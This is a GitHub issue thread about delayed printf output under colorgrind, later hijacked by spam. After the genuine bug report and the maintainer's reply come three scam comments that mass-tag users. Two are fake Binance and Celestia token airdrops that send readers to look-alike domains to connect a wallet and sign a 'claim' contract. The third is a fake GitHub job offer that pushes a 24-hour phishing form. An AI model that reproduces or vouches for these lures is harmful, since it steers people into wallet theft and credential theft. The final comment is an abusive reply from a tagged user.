### ISSUE TITLE
Flush problems with printf

### ISSUE THREAD

**Issue by Mlordx** [renatocf/colorgrind#1]
Program print outputs are being delayed until the program ends when running colorgrind. 

![Without colorgrind](https://cloud.githubusercontent.com/assets/1630151/16511971/b032c81a-3f2c-11e6-8a64-813a44e9ed79.png)
![With colorgrind](https://cloud.githubusercontent.com/assets/1630151/16511970/adb0b7c8-3f2c-11e6-885e-77f46439cff8.png)

**Comment by renatocf** [comment]
@Mlordx, please run the program with the newest version I've uploaded.

**Comment by sauplatform** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @super1ha1, @alfonsotech, @phial3, @dajisiyyds, @iamv1n, @ZuhairHossain, @Jennlb, @hishamank, @bsgrigorov, @farhad, @sagungargs15, @asifhaider, @jeremyj563, @swimmingHaribo, @blockxtech, @0xBadMad, @xiewenliang, @Zarathos94, @Galenki, @wpazio, @joker-fightclub, @musik, @DoYouLoveThisJob, @stealhead, @spacex81, @bysr, @DevWithAz, @wpank, @yasinatesim, @tgntr, @rhutik03, @muffafa, @gucmurat, @vgjm, @iyangming, @tangzulong, @Yuvrajchandra, @taiak, @chaytanyasinha, @carr351283168, @seanyu-git, @kkkkkxxxxx, @kunal00000, @moises2406, @j174in, @liberty-song, @hexinlei, @gcoli6, @dfxshxr, @lanbo1984

**Comment by EuJinnLucaShow** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Capella87, @1052445594, @job-wangwei, @fcarli3, @IsSenHu, @shewbaka, @cvic, @suncle1993, @devayanxr, @wenhongming, @LeoVS09, @DivyaSaiKrishna, @chozahell, @chenxiaoci, @handlemyfinance, @friendwu, @saeedhassansolangi, @fengjy73, @ibuwei, @Hishantik

**Comment by RojinMajd** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!redfishiaven, @itxDeeni, @nurullahisik, @Zambito1, @piravp, @dvmoomoodv, @zxg-pi, @omardoma, @ntgn81, @Astrabacus, @nurwin, @acarnage, @bolerovt, @dzf0023, @philipgloyne, @grok-phantom, @tobbe1981, @Sh9hid, @imjaden, @kilianbreathnach

**Comment by farhad** [comment]
stop mentioning my name you fucking morons
